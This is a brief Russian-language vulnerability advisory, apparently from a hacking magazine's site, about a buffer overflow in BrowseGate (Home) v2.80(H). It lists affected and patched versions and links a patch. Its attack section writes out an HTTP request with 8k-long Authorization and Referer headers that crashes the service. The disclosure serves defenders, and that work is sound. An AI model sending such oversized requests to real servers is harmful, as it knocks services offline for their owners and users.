Рекомендуем почитать:
Хакер #305. Многошаговые SQL-инъекции
Delphis Consulting Internet Security Team (DCIST) обнаружила прореху в безопасности в Browsegate, которая позволяет хакеру вызвать переполнение буфера с последующим дауном. 🙂
Системы уязвимы:
BrowseGate (Home) v2.80(H)
Системы не подверженные багу:
BrowseGate (Home) v2.80.001(H)
Атака:
Законнектитесь к 80 порту и отправьте следующее:
GET / HTTP/1.0<cr>
Authorization: Basic(A x 8k)<cr>
From: dcist@delphisplc.com<cr>
If-Modified-Since: Sat, 29 Oct 1994 19:43:31 GMT<cr>
Referer: http://www.delphisplc.com/(A x 8k)<cr>
UserAgent: DCIST Browser 1.1<cr>
<cr><cr>
Решение:
Скачай патч 🙂
http://www.netcplus.com/browsegate.htm